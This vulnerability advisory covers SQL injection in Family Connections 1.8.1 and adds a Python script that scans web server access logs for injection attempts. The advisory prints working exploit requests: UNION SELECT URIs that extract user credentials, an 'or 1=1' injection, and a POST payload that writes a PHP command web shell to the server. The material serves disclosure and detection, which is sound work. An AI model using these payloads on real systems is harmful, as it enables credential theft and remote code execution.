

Title Family Connections Multiple SQL Injection Vulnerabilities
Published 2009-03-30-12:00AM
Updated 2009-04-01-05:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Salvatore "drosophila" Fresta
Vulnerable  Haudenschilt Family Connections 1.8.1
Not Vulnerable  Haudenschilt Family Connections 1.8.2
Code  Attackers can use a browser to exploit these issues. The following example URIs, data, and exploit are available:
http://www.example.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.example.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users
http://www.example.com/path/activate.php?uid=1 or 1=1&code=
POST /path/lostpw.php HTTP/1.1
Host: www.site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#
  • /data/vulnerabilities/exploits/34297.html
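For sites still running 1.8.1, the GET-based requests above leave a trace in the web server access log. The following is an added example, not part of the original advisory or the Family Connections code: it flags values of the parameters named above that fall outside an assumed allow-list (numeric ids, a single letter, an alphanumeric activation code). The log lines are constructed, and the function and variable names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected value shapes for the parameters named in the advisory. These shapes
# are assumptions about legitimate traffic, not taken from the application.
EXPECTED = {
    "addressbook.php": {"letter": re.compile(r"[A-Za-z]?")},
    "recipes.php": {"category": re.compile(r"\d+"), "id": re.compile(r"\d+")},
    "activate.php": {"uid": re.compile(r"\d+"), "code": re.compile(r"[A-Za-z0-9]*")},
}
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for values outside the allow-list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    rules = EXPECTED.get(script, {})
    hits = []
    # parse_qsl percent-decodes, so encoded quotes and spaces are compared decoded.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        rule = rules.get(name)
        if rule is not None and not rule.fullmatch(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Collect allow-list violations across all log lines."""
    return [hit for line in lines for hit in suspicious_params(line)]

# Constructed access-log lines (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Mar/2009:10:00:00 +0000] "GET /path/addressbook.php?letter=A HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Mar/2009:10:00:05 +0000] "GET /path/recipes.php?category=1&id=7 HTTP/1.1" 200 2310',
    '198.51.100.7 - - [30/Mar/2009:10:02:11 +0000] "GET /path/activate.php?uid=1%20or%201=1&code= HTTP/1.1" 200 912',
    '198.51.100.7 - - [30/Mar/2009:10:02:40 +0000] "GET /path/recipes.php?category=1&id=1%20UNION%20SELECT%201,2,username,password,5,6%20FROM%20fcms_users HTTP/1.1" 200 3044',
]

if __name__ == "__main__":
    for script, name, value in scan(SAMPLE_LOG):
        print(f"{script}: {name}={value!r}")
```

The lostpw.php request carries its payload in the POST body, which a standard access log does not record, so this check does not cover it. Upgrading to 1.8.2, listed above as not vulnerable, is the fix; the log check only helps find past attempts.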



    Copyright 2007, SecurityDot
    Fri, 18 Dec 2009 21:45:27 +0000
